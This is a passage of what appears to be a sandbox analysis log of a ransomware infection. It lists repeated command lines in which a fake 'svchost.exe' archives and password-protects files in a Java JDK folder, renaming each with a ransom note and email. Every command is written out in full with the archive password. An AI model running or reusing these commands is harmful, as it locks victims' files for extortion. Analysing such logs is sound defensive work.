  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1632
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1836
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:992
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1888
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1104
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2480
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:804
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:764
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1580
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:264
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2152
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2124
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1944
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2384
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:848
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1524
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1280
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2300
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2408
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:872
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:680
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:808
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:316
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1516
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2928
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2660
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2288
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2808
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2596
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2740
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2744
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2772
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2436
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:560
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2024
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2716
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1720
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1384
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:1668
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml(!! to decrypt email id 1307002018 to [email protected] !!)" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100AuwuqLurnALALLttLquruuVntFVrnLAnqAAwtAFuur -m0 -y
  2⤵
  PID:2644
- C:\ProgramData\msvkp\svchost.exe
